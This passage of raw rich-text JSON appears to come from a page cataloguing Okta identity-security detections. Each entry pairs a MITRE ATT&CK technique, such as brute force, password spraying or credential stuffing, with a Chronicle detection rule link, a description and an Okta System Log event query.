Accounts\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Chronicle 
identifier\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/chronicle/detection-rules/blob/main/rules/community/okta/okta_multiple_users_logins_with_invalid_credentials_from_the_same_ip.yaral\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"okta_multiple_users_logins_with_invalid_credentials_from_the_same_ip\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"NEW: Detects multiple user logins with invalid credentials from a single IP.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Reference\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"System Log events for Okta 
ThreatInsight\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"User Reported Suspicious Activity\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ID\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1078/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1078\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Technique\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Valid Account\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Chronicle 
identifier\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/chronicle/detection-rules/blob/main/rules/community/okta/okta_user_suspicious_activity_reported.yaral\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"okta_user_suspicious_activity_reported\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"NEW: An Okta user reports suspicious activity in response to an end user security notification.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Reference\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Security/suspicious-activity-reporting.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Suspicious Activity 
Reporting\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta System Log Query\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"user.account.report_suspicious_activity_by_enduser\\\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Multiple Failed Requests to Access Okta Applications\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ID\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1550/004/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1550.004\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Technique\",\"marks\":[],\"data\"
:{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Use Alternate Authentication Material: Web Session Cookie\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Chronicle identifier\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/chronicle/detection-rules/blob/main/rules/community/okta/okta_multiple_failed_requests_to_access_applications.yaral\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"okta_multiple_failed_requests_to_access_applications\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Detects multiple failed requests to access applications\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta 
Reference\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/shareddetections\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta and Splunk Combine to Detect Common Attacks\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ThreatInsight Alert: Suspected Brute Force\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ID\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1110/001/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1110.001\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Technique\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\
"nodeType\":\"text\",\"value\":\"Brute Force: Password Guessing\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Chronicle identifier\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/chronicle/detection-rules/blob/main/rules/community/okta/okta_threatinsight_suspected_brute_force_attack.yaral\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"okta_threatinsight_suspected_brute_force_attack\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"NEW: Okta ThreatInsight detects multiple login failures from the same IP across one or more Okta orgs\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta 
Reference\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"System Log events for Okta ThreatInsight\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta System Log Query\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"security.threat.detected\\\" and outcome.reason eq \\\"Login Failures\\\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ThreatInsight Alert: Suspected Targeted Brute 
Force\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ID\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1110/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1110\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Technique\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Brute Force\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Chronicle 
identifier\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/chronicle/detection-rules/blob/main/rules/community/okta/okta_threatinsight_targeted_brute_force_attack.yaral\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"okta_threatinsight_targeted_brute_force_attack\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"NEW: Okta ThreatInsight detects access requests from known malicious IPs targeting a specific org.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Reference\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"System Log events for Okta 
ThreatInsight\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta System Log Query\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"security.attack.start\\\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ThreatInsight Alert: Login Failure with High Unknown Users\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ID\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1110/004/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1110.004\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Technique\",\"marks\":[],\"data\":{}}]}]},{\"nodeTyp
e\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Brute Force: Credential Stuffing\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Chronicle identifier\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/chronicle/detection-rules/blob/main/rules/community/okta/okta_threatinsight_login_failure_with_high_unknown_users.yaral\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"okta_threatinsight_login_failure_with_high_unknown_users\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta's ThreatInsight can identify multiple login failures with high unknown users count from the same IP across one or more Okta orgs.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta 
Reference\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"System Log events for Okta ThreatInsight\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta System Log Query\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"security.threat.detected\\\" AND outcome.reason co \\\"Login failures with high unknown users count\\\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ThreatInsight Alert: Suspected Password Spray 
Attack\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ID\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1110/003/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1110.003\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Technique\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Brute Force: Password Spraying\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Chronicle 
identifier\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/chronicle/detection-rules/blob/main/rules/community/okta/okta_threatinsight_suspected_password_spray_attack.yaral\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"okta_threatinsight_suspected_password_spray_attack\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta's ThreatInsight can identify Password Spray attacks.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Reference\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"System Log events for Okta 
